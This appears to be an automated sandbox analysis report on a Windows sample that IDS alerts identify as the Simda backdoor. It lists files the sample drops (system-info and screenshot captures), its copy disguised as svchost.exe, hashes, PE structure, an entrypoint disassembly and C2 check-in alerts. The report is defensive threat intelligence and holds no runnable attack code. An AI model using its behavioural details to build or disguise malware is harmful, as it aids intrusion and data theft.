                                                                                                                                                                                                          Preview:PK........:ckY...^;...........debug_11;Nov;2024_12;31;11.logUT...................0........@..z...Ee.6.ZUB..xX.u..1.......@i}.........M..Y!...T.......L.bS-.].!w..g...t.....q....z@.w..5M.&.O,,8.V...Y...J..T...0.B.Bj..!.Y...........:c...M.G....y....p\..$.Qc.C.*.V.Y....8v8..|B..T.Ev.%.e.....0$y...v....7.]...|...X3.Qb-_e..w........L..O_....S..{..ez.z.n i..G.3t;..P..{.u..q.T;.."...|.(..h...s..y)@..F.....>".<...q.=.=..%Cq..V..f..Y...l.v..kP.p...&.....\.*?.4...L~...0.OLr.-...?....U&S.'gi............j-..cuEM7..X.]/>{iu.;..........J.L.F.y.@..`........~..O...K.......U8...tz7.O..p"3=_..>Qkp1Q.1.........A`..=.....'......(-.?B&...PK........:ckYv..$2...6.......scr.bmpUT................._...'.R.6.!a\.....3..e0.......U.t..6+.W.%.m..no>..c....;.L....h...m...]..f..5....@.v.....DJ.Y&..L.....s..9..d..F|.%%.`0H..O.~.8.......;<...N....g.....h./..Nz<..:..y..?....._............:..;~.......;.....-.KWv.........w.~...:..u...t..t......._..........^C.......D.............O.

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\6d1da670\debug_11;Nov;2024_12;31;11.log

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1806
                                                                                                                                                                                                          Entropy (8bit):5.3568589413329635
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:uXGoLQyTyU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xw1zVbUlnX93:ulTudPSF9Xy/rJ+DAxw150nX7nN
                                                                                                                                                                                                          MD5:5DFA88ADF4CAE900D2FEFE402C98B9FF
                                                                                                                                                                                                          SHA1:756DD45365A3184065C197110E6CE325A03EAD12
                                                                                                                                                                                                          SHA-256:789933808AED6759C643D44B6C24D198CBBFFA7A39C7B5DF7D6025BF721AE30D
                                                                                                                                                                                                          SHA-512:29B7FA094F7E127DB194AA437606AB0AD720D3B805D4D692203EF735FF86A4D86C197D49EA9531381866D5459412135A7E162ACEE517F084528A06244B4107DD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x768BCC12 Eax = 0x07C3F8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x00368000 Ebp = 0x07C3F940.Esp = 0x07C3F8E8 Esi = 0x0000071A Edi = 0x032CF8D8.EFlags = 0x00000246..Main module:.main 0x02C70000-0x00061000..ThreadStart = unknown!0x02c85590..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\6d1da670\scr.bmp

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1311798
                                                                                                                                                                                                          Entropy (8bit):2.9790941969800033
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24576:ncsN2K/9fOmGj82VwYV+AyYMXNNgIJTfq6uxErJX6oKoOoSX5DnUGJCtjyk9Bc3T:ncsN2K/9fOmGj82VwYV+AyYMXNNgIJT4
                                                                                                                                                                                                          MD5:C994D4A5288C688DF7FF12B6716EFDDB
                                                                                                                                                                                                          SHA1:42ADE890D84F8467B5B6E088133134319CFAA329
                                                                                                                                                                                                          SHA-256:7E2B405112E258B6B526FC24285652BD58F981278D227FBAA25CB8554F3B4786
                                                                                                                                                                                                          SHA-512:96C04265DDC81A7043BA3397DF0B8582B35EE8F9476C4CC59D582E475315B720F73977C26512792C4559835C6A60F7C6A13656CC5E0B3EA9837AC05C5E6CA48F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:BM6.......6...(............................................................................... @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`................@...@. .@.@.@.`.@...@...@...@...@ ..@ .@ @.@ `.@ ..@ ..@ ..@ ..@@..@@ .@@@.@@`.@@..@@..@@..@@..@`..@` .@`@.@``.@`..@`..@`..@`..@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@...@...@...@...@. .@.@.@.`.@...@..@...@......... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`....................... ...@...`....................... ...@...`...................... ...@...`.................. ... .. @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...@...`....................... ...@...`...

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\6d1da670\sysinfo.log

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7190
                                                                                                                                                                                                          Entropy (8bit):5.184922652203559
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:/UCyRgBZYV8wWyFHHOp33yKWK2Yp2C771Aezexxuv0lTpA6kxMNSBDQfm7r2w6EO:/+cpPZ1BMZhP2sZA/lkb
                                                                                                                                                                                                          MD5:79B2D81DF9790EC9E0108FEEC2EADE12
                                                                                                                                                                                                          SHA1:0C9F3785C791936D946CEB4E69139A1EFEFB074B
                                                                                                                                                                                                          SHA-256:7DC505FCB5DB8C3FA8022A5654E3675A1A1097A85EA96FA845DC2C45EF3DAFC5
                                                                                                                                                                                                          SHA-512:D5D3CCA0EA10597A4E9AA8EC9ACB09BA87E719D72A72C810EB1FF580079B15780766EF378ACE26B072AE6C0A904FFFD59754C75E4287DC6DF54F5E22FE314DBB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:{BotVer: 4.0.1}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 11:Nov:2024}.{Local time: 12:31:11}.{GMT: -5:00}.{Uptime: 0d 1h 30m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:14332.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.8:139.0.0.0.0:0.LISTEN.TCP.192.168.2.8:49311.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.8:49702.192.168.2.1:445.ESTAB.TCP.192.168.2.8:49703.23.206.229.226:

                                                                                                                                                                                                          C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\WlCVLbzNph.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):210432
                                                                                                                                                                                                          Entropy (8bit):7.831246470336783
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:77VD4DUHnNZkfOP6sfIOpJ9C3hPlGxt1UhRkgyankTIzfwAYzWcXCyqT36zhRRKy:1zHnMLm5GNGxHUhtnkdpHqTKzhh8i
                                                                                                                                                                                                          MD5:7F7F85F214F3A6B27A5B5FF8F6EC6188
                                                                                                                                                                                                          SHA1:88A754B4E31D3FCED3D73ECA0EF9C42949CEA89B
                                                                                                                                                                                                          SHA-256:CB96B6711EFDB2F5C7717F611C978ED611C54CC0970DEA7C37C628147902739C
                                                                                                                                                                                                          SHA-512:485BE8392879FBC3A3FE1E1E591663D959E0109E4AE143085CCC0FC581E6A22E9D30EF0D2ED069DC2995D028DFBD6FBB134E4904502798264A548890E892910F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@....................................1.....................................R..........4............................................................................................................text...[0.......2.................. ..`.j......#k...P.......6..............@..@.nkytZ...............<..............@..@.N......hQ...P.......@..............@..@.fc.....&............N..............@....data....6...@...8...T..............@....s.......e..........................@....w..................................@....rsrc...4...........................@..@.reloc...............2..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\WlCVLbzNph.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Entropy (8bit):7.831241949879198
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:WlCVLbzNph.exe
                                                                                                                                                                                                          File size:210'432 bytes
                                                                                                                                                                                                          MD5:bb4d08026f4dad460862be3d65fbeddb
                                                                                                                                                                                                          SHA1:2caf9f151b88a328475181b2ecce22f90694795f
                                                                                                                                                                                                          SHA256:7ef95304b8e240cba2fddbc90e13d5e8fead7dd65c6c2cddc0e11af14198703b
                                                                                                                                                                                                          SHA512:6f73ee62eabf33c0c9eabb09921c48f1be4d3c5eea9251d2ffbb745be8bff879b7b5ad8289a1aaafbc24a1df2fd98fd8a5d45ea5ca3c5b2e5209d119e8948e81
                                                                                                                                                                                                          SSDEEP:3072:m7VD4DUHnNZkfOP6sfIOpJ9C3hPlGxt1UhRkgyankTIzfwAYzWcXCyqT36zhRRKy:szHnMLm5GNGxHUhtnkdpHqTKzhh8i
                                                                                                                                                                                                          TLSH:33241206B59B418AC90A19B384FF77142BA87DDD1322D33F4E745EFA2CD60A93872984
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".:.................2..........;........@....@.................................Fa.Q...................................

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:004ab5b5d5b59535

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x401b3b
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                          Time Stamp:0x3A11222E [Tue Nov 14 11:29:50 2000 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                          Import Hash:616d060f84174fbe550615d295f4ce51

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          mov ecx, 00000000h
                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                          call dword ptr [004150F8h]
                                                                                                                                                                                                          mov dword ptr [00424B42h], eax
                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                          sub ebx, 0000010Ah
                                                                                                                                                                                                          jnc 00007F3D20E2EEE8h
                                                                                                                                                                                                          add ebx, 00000D32h
                                                                                                                                                                                                          mov ecx, ebx
                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                          add ecx, esi
                                                                                                                                                                                                          sub ecx, 00000222h
                                                                                                                                                                                                          ror ecx, 05h
                                                                                                                                                                                                          sub ecx, dword ptr [00425025h]
                                                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                                                          sub dword ptr [00424AEDh], ecx
                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                          add dword ptr [004250ADh], ecx
                                                                                                                                                                                                          call 00007F3D20E2FC34h
                                                                                                                                                                                                          mov dword ptr [00424377h], eax
                                                                                                                                                                                                          push 00000001h
                                                                                                                                                                                                          pop edx
                                                                                                                                                                                                          push edx
                                                                                                                                                                                                          mov ecx, 00486F5Ah
                                                                                                                                                                                                          mov ebp, 00071E7Eh
                                                                                                                                                                                                          mov eax, ebp
                                                                                                                                                                                                          sub ecx, eax
                                                                                                                                                                                                          call dword ptr [ecx]
                                                                                                                                                                                                          mov dword ptr [00424170h], eax
                                                                                                                                                                                                          mov esi, 0020A87Ch
                                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                                          shl eax, 1
                                                                                                                                                                                                          call dword ptr [eax]
                                                                                                                                                                                                          mov dword ptr [0042424Eh], eax
                                                                                                                                                                                                          or eax, eax
                                                                                                                                                                                                          jne 00007F3D20E2EEE5h
                                                                                                                                                                                                          mov edx, esi
                                                                                                                                                                                                          dec edi
                                                                                                                                                                                                          mov edi, 00000001h
                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          mov ecx, 0020A86Ah
                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                          shl eax, 1
                                                                                                                                                                                                          call dword ptr [eax]
                                                                                                                                                                                                          mov dword ptr [00425205h], eax
                                                                                                                                                                                                          ret
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov eax, ebp
                                                                                                                                                                                                          push eax
                                                                                                                                                                                                          push esp
                                                                                                                                                                                                          pop ebp
                                                                                                                                                                                                          sub esp, 14h
                                                                                                                                                                                                          lea eax, dword ptr [004245CCh]

                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x152040xb4.N
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x29434.rsrc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x890000x3fe.reloc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x1b5140x1c.fc
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                          Sections

                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                          .text0x10000x305b0x3200746849c22bd1df3ec913e6afd3261c01False0.700703125data6.211906712870064IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .j0x50000x6b230x6000ac67a98e2d3f6254b28e45da115c69bFalse0.96875data7.160260489225009IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .nkytZ0xc0000x8a0b0x400a47b6a356a3431ac9df3442ebc526efbFalse0.728515625data5.978528077403749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .N0x150000x51680xe001dbd683313ed000c6b75f32744694ec5False0.47572544642857145data5.278775089069264IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .fc0x1b0000x8d260x60012c7d10915b83bfd9faa65fa82180001False0.736328125data5.748360690216942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .data0x240000x36c00x38009a257e09d714d8ab48b690e8453afbd6False0.81298828125data6.7672572781458635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .s0x280000x65bb0x80030f797c52e34fe45fded3dfd0de177a6False0.2587890625data2.075341234110115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .w0x2f0000x2fd0b0x8001958d4f52ae8d506c6908df58c4a3a64False0.6533203125data5.386043783353626IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                          .rsrc0x5f0000x294340x29600496540dfc12657aab2ce18ca319f7ae5False0.9770404550604229data7.967828924738939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                          .reloc0x890000x3fe0x400a91b09921b19daa6e0bdbe6b0aaccf90False0.939453125data6.753512294366748IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                          Resources

                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                          RT_ICON0x5f3100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4143996247654784
                                                                                                                                                                                                          RT_DIALOG0x603b80x50dataEnglishUnited States1.0
                                                                                                                                                                                                          RT_STRING0x604080x11adataEnglishUnited States0.7304964539007093
                                                                                                                                                                                                          RT_STRING0x605240x114dataEnglishUnited States0.7282608695652174
                                                                                                                                                                                                          RT_STRING0x606380x10cdataEnglishUnited States0.7388059701492538
                                                                                                                                                                                                          RT_STRING0x607440x154dataEnglishUnited States0.6970588235294117
                                                                                                                                                                                                          RT_STRING0x608980x11aTarga image data - Color 2 x 55 x 32 +42 +86 "\011"EnglishUnited States0.7269503546099291
                                                                                                                                                                                                          RT_STRING0x609b40x16edataEnglishUnited States0.6857923497267759
                                                                                                                                                                                                          RT_STRING0x60b240x132dataEnglishUnited States0.7124183006535948
                                                                                                                                                                                                          RT_STRING0x60c580xfedataEnglishUnited States0.7480314960629921
                                                                                                                                                                                                          RT_RCDATA0x60d580x27493dataEnglishUnited States1.0003480098188484
                                                                                                                                                                                                          RT_GROUP_ICON0x881ec0x14dataEnglishUnited States1.1
                                                                                                                                                                                                          RT_VERSION0x882000x234dataEnglishUnited States0.5336879432624113

                                                                                                                                                                                                          Imports

                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                          kernel32.dllSetLocaleInfoA, lstrcpyn, CreateNamedPipeA, GetEnvironmentVariableA, GetExitCodeThread, OpenEventW, GetLogicalDriveStringsA, CopyFileExW, SetPriorityClass, GetProcAddress, CreateMutexA, CreateMutexW, QueryPerformanceCounter, CreateThread, SetUnhandledExceptionFilter, OpenMutexW, GetExitCodeProcess, GlobalGetAtomNameA, GetFileTime, GetCalendarInfoA, MulDiv, CreateFileMappingW, CreateMailslotA, FreeResource, LocalFree, DeleteAtom, GetVolumeInformationA, RaiseException, AddAtomA, GlobalFindAtomW, RemoveDirectoryW, GlobalFindAtomA, CreateMailslotW, GetProcessHeaps, EndUpdateResourceA, CopyFileExA, CreateNamedPipeW, SleepEx, GetModuleHandleA, WaitForSingleObject, GetSystemDefaultLangID, SetEvent, TlsAlloc, SetCalendarInfoW, GetLastError, GetFileSize, lstrlen, DuplicateHandle, GetAtomNameW, GetStringTypeW, CreateFileA
                                                                                                                                                                                                          USER32.DLLCheckMenuItem, GetDC, DefDlgProcW, BringWindowToTop, GetDlgItem, EnumWindows, PeekMessageW, SetCursor, GetWindowLongA, MessageBoxIndirectW, CreatePopupMenu, keybd_event, GetWindowTextLengthA
                                                                                                                                                                                                          gdi32.dllCreateFontIndirectExA, CreatePolygonRgn, CreateDIBitmap, GetLogColorSpaceW, SetGraphicsMode, GdiGetBatchLimit, ScaleWindowExtEx, SelectObject, GetEnhMetaFileHeader, GetFontData, SetLayout, SetRectRgn, ExtSelectClipRgn, EnumFontFamiliesA, GetAspectRatioFilterEx, GetNearestPaletteIndex, PolylineTo, PatBlt, SelectClipRgn
                                                                                                                                                                                                          ADVAPI32.DLLRegEnumValueW, RegReplaceKeyA, RegCreateKeyW, RegQueryValueA, RegCreateKeyExA, RegReplaceKeyW, RegCloseKey
                                                                                                                                                                                                          SHLWAPI.DLLPathGetArgsW, ChrCmpIA, StrSpnW, PathAddBackslashW, PathIsUNCA, SHRegOpenUSKeyW, PathIsPrefixA, PathCompactPathExA
                                                                                                                                                                                                          COMCTL32.DLLFlatSB_SetScrollRange, InitCommonControls
                                                                                                                                                                                                          winspool.drvAddFormW, EnumMonitorsW, OpenPrinterW, GetJobW, DeleteMonitorA, EndDocPrinter, AddPrinterConnectionW, SetPrinterDataExW
                                                                                                                                                                                                          INETCOMM.DLLMimeOleParseRfc822Address, MimeOleParseRfc822AddressW, HrGetAttachIcon, EssSecurityLabelEncodeEx, MimeOleGetDefaultCharset, MimeOleGetFileExtension, HrAttachDataFromFile, EssKeyExchPreferenceEncodeEx, EssSignCertificateDecodeEx, MimeOleSMimeCapGetHashAlg, EssKeyExchPreferenceDecodeEx, MimeOleGetCharsetInfo, MimeOleGetCertsFromThumbprints

                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                          2024-11-11T18:24:04.962880+01002021022ET MALWARE Wapack Labs Sinkhole DNS Reply11.1.1.153192.168.2.853944UDP
                                                                                                                                                                                                          2024-11-11T18:24:05.285685+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84970518.208.156.24880TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.431780+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84970823.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.552641+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849710199.59.243.22780TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.579738+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.8497123.94.10.3480TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.580932+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971375.2.71.19980TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.585920+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971544.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.586456+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971444.221.84.10580TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.586777+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.849712TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.586777+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.849712TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.593017+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.849715TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.593017+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.849715TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.597685+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.709221+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849711208.100.26.24580TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.876538+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.894705+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971785.17.31.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:05.899510+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971623.253.46.6480TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.504059+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849709188.114.96.380TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.504085+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.849707154.212.231.8280TCP
                                                                                                                                                                                                          2024-11-11T18:24:06.504097+01002804852ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin1192.168.2.84971985.17.31.8280TCP
